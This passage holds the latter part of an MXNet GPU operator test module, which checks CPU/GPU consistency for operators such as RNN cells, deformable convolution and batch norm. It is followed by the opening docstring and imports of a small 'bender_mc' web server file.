'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
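# unroll both cells over 5 time steps, copy cell1's weights into cell2 via unpack/pack,
# and check that the forward outputs agree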
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_disabled()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# the wide fp16 tolerance is kept in case the (currently commented-out) fp16 context above is re-enabled
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_disabled()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
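# launch(args, ctx, grid_dims, block_dims[, shared_mem]) -- the trailing value on the saxpy
# calls below sizes the dynamically allocated shared memory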
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
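# global norm = sqrt(3*3*1 + 4*4*1) = sqrt(25) = 5, so both arrays are scaled by max_norm / norm = 1/5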
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
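# gradients should propagate through copyto() across devices and match the result of
# applying tanh three times on a single device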
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
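# ceiling division: ceil(1000 / 16) = 63 cells along each spatial axis of the feature map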
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
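# with_nms=False uses threshold=1.0, which effectively disables NMS so CPU and GPU proposals
# can be compared element-wise; with NMS enabled only approximate agreement is required below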
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% guarantee with NMS; only require that most entries agree
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
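# BatchNorm should support a backward pass in inference mode (train_mode=False),
# both with and without cuDNN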
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def _check_batchnorm_result(input, num_devices=1, cuda=False):
from mxnet.gluon.utils import split_and_load
def _find_bn(module):
if isinstance(module, (mx.gluon.nn.BatchNorm, mx.gluon.contrib.nn.SyncBatchNorm)):
return module
elif isinstance(module.module, (mx.gluon.nn.BatchNorm, mx.gluon.contrib.nn.SyncBatchNorm)):
return module.module
raise RuntimeError('BN not found')
def _syncParameters(bn1, bn2, ctx):
ctx = input.context
bn2.gamma.set_data(bn1.gamma.data(ctx))
bn2.beta.set_data(bn1.beta.data(ctx))
bn2.running_mean.set_data(bn1.running_mean.data(ctx))
bn2.running_var.set_data(bn1.running_var.data(ctx))
input1 = input.copy()
input2 = input.copy()
if cuda:
input1 = input.as_in_context(mx.gpu(0))
ctx_list = [mx.gpu(i) for i in range(num_devices)]
else:
ctx_list = [mx.cpu(0) for _ in range(num_devices)]
nch = input.shape[1]
bn1 = mx.gluon.nn.BatchNorm(in_channels=nch)
bn2 = mx.gluon.contrib.nn.SyncBatchNorm(in_channels=nch, num_devices=num_devices)
bn1.initialize(ctx=ctx_list[0])
bn2.initialize(ctx=ctx_list)
# using the same values for gamma and beta
#_syncParameters(_find_bn(bn1), _find_bn(bn2), ctx_list[0])
input1.attach_grad()
inputs2 = split_and_load(input2, ctx_list, batch_axis=0)
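# split the batch across the devices so SyncBatchNorm aggregates statistics over all of them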
for xi in inputs2:
xi.attach_grad()
with mx.autograd.record():
output1 = bn1(input1)
output2 = [bn2(xi) for xi in inputs2]
loss1 = (output1 ** 2).sum()
loss2 = [(output ** 2).sum() for output in output2]
mx.autograd.backward(loss1)
mx.autograd.backward(loss2)
output2 = mx.nd.concat(*[output.as_in_context(input.context) for output in output2], dim=0)
# check that forward outputs and running statistics match between BatchNorm and SyncBatchNorm
assert_almost_equal(input1.asnumpy(), input2.asnumpy(), atol=1e-3, rtol=1e-3)
assert_almost_equal(output1.asnumpy(), output2.asnumpy(), atol=1e-3, rtol=1e-3)
assert_almost_equal(_find_bn(bn1).running_mean.data(ctx_list[0]).asnumpy(),
_find_bn(bn2).running_mean.data(ctx_list[0]).asnumpy(),
atol=1e-3, rtol=1e-3)
assert_almost_equal(_find_bn(bn1).running_var.data(ctx_list[0]).asnumpy(),
_find_bn(bn2).running_var.data(ctx_list[0]).asnumpy(),
atol=1e-3, rtol=1e-3)
input2grad = mx.nd.concat(*[output.grad.as_in_context(input.context) for output in inputs2], dim=0)
assert_almost_equal(input1.grad.asnumpy(), input2grad.asnumpy(), atol=1e-3, rtol=1e-3)
def test_sync_batchnorm():
def get_num_devices():
for i in range(100):
try:
mx.nd.zeros((1,), ctx=mx.gpu(i))
except:
return i
# no need to use SyncBN with 1 gpu
if get_num_devices() < 2:
return
ndev = 2
# check with unsync version
for i in range(10):
_check_batchnorm_result(mx.nd.random.uniform(shape=(4, 1, 4, 4)),
num_devices=ndev, cuda=True)
if __name__ == '__main__':
import nose
nose.runmodule()
|
server.py
|
"""
bender_mc.server
~~~~~~~~~~~~~~~~
Built-in, production-ready web server for easy access.
"""
# :copyright: (c) 2020 by Nicholas Repole.
# :license: MIT - See LICENSE for more details.
import configparser
from cheroot import wsgi
from cheroot.ssl.builtin import BuiltinSSLAdapter
import os
import logging
import threading
import sys
import subprocess
